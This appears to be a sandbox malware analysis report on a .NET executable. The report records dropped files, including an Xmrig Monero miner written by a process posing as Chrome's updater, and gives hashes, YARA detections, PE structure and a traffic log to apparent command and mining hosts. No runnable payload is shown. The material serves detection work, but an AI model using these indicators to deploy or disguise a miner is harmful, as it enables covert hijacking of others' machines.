SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_fwz4rhgi.bno.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_gg3vz4av.wbn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_gorx4sek.wpy.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_imm4yjzd.s55.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ksftfjhu.ihy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ktkmrtsx.ttm.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_nwyy45no.joc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_phg13u1g.etr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_q1ju1rxw.2yz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_s3npod4g.uqp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_srasxwe2.pi5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_tfhecpxn.izg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_vb1jvdmf.vlp.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_waohpelt.2y5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\whxcdqscjswq.tmp

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5536256
Entropy (8bit):	6.689058470432344
Encrypted:	false
SSDEEP:	98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
MD5:	8FA2F1BA9B9A7EA2B3C4DD627C627CEC
SHA1:	358E3800286E5D4C5662366AD7311BC5A51BA497
SHA-256:	78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
SHA-512:	74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\whxcdqscjswq.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 64%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................\|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.929719404741846
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	13'188'608 bytes
MD5:	e2982df7bd07c80ffdd02a7d680b64bc
SHA1:	85d6417c7b391bea381eb07d56eff39efe051a04
SHA256:	3fb42de7bef728db9db776ce892a5893f84b24c433253988d849c514a4008b67
SHA512:	50b6fe1cf8cd4c253d8c78c44bb2435f9cca4abe7c3742aad2f36aaa784794badfd476b355f58702b4eb19db616aad43f21c4116cb3f6775deb1f1b188c359d1
SSDEEP:	196608:IYCTcgSo0/AtEN/OWvOIC1g//iFwFS/DHFp36Y2lybUg2Qz1e:IYCTcghQAtEZVisqFmS/DHT36nyb93p
TLSH:	97D602327114F55DB5B70DB05E82B3EF22BCF360BE563D9CD7A0524B9225628E4BA306
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L.Me.................4..........>S... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x109533e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x654DF74C [Fri Nov 10 09:26:36 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc952e8	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc96000	0x4e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc93344	0xc93400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc96000	0x4e8	0x600	False	0.376953125	data	3.7439121542733242	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc98000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc960a0	0x254	data			0.46476510067114096
RT_MANIFEST	0xc962f8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 10, 2023 15:35:35.858283043 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.155765057 CET	80	49715	95.214.26.28	192.168.2.6
Nov 10, 2023 15:35:36.158792019 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.159581900 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.159661055 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.457026005 CET	80	49715	95.214.26.28	192.168.2.6
Nov 10, 2023 15:35:36.457129002 CET	80	49715	95.214.26.28	192.168.2.6
Nov 10, 2023 15:35:36.457345009 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.459074020 CET	49715	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:35:36.756429911 CET	80	49715	95.214.26.28	192.168.2.6
Nov 10, 2023 15:35:57.795825958 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.096556902 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.098942995 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.099541903 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.405169010 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.405234098 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.405299902 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.406169891 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.708564043 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.708703041 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.708745956 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.748305082 CET	14433	49718	51.15.58.224	192.168.2.6
Nov 10, 2023 15:35:58.799313068 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:58.843674898 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:58.843708038 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:58.843799114 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:58.868051052 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:58.868063927 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.193067074 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.194446087 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.194458008 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.195569992 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.195628881 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.197779894 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.197854042 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.197931051 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.197938919 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.252264023 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.831748962 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.831782103 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.831862926 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.831872940 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.831933022 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.846745014 CET	49719	443	192.168.2.6	172.67.34.170
Nov 10, 2023 15:35:59.846765041 CET	443	49719	172.67.34.170	192.168.2.6
Nov 10, 2023 15:35:59.847501993 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:59.847527027 CET	49718	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:35:59.848079920 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.146975040 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.147066116 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.147428989 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.448524952 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.448540926 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.448606014 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.449366093 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.749380112 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.749634027 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.749689102 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:00.783705950 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:00.830430984 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:34.188868999 CET	14433	49720	51.15.58.224	192.168.2.6
Nov 10, 2023 15:36:34.361607075 CET	49720	14433	192.168.2.6	51.15.58.224
Nov 10, 2023 15:36:44.107213020 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.415287971 CET	80	49725	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:44.417797089 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.418081045 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.418103933 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.726419926 CET	80	49725	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:44.727458954 CET	80	49725	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:44.727629900 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.727721930 CET	49725	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:44.812666893 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.035667896 CET	80	49725	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.113693953 CET	80	49726	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.113809109 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.114145041 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.114195108 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.415158033 CET	80	49726	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.415339947 CET	80	49726	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.415416002 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.415623903 CET	49726	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.492810011 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.717453003 CET	80	49726	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.794316053 CET	80	49727	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:45.794799089 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.795119047 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:45.795156002 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.094124079 CET	80	49727	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.094574928 CET	80	49727	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.094729900 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.094880104 CET	49727	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.142474890 CET	49728	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.393297911 CET	80	49727	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.439101934 CET	80	49728	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.439598083 CET	49728	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.439987898 CET	49728	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.440033913 CET	49728	80	192.168.2.6	95.214.26.28
Nov 10, 2023 15:36:46.736617088 CET	80	49728	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.736902952 CET	80	49728	95.214.26.28	192.168.2.6
Nov 10, 2023 15:36:46.737150908 CET	49728	80	192.168.2.6	95.214.26.28
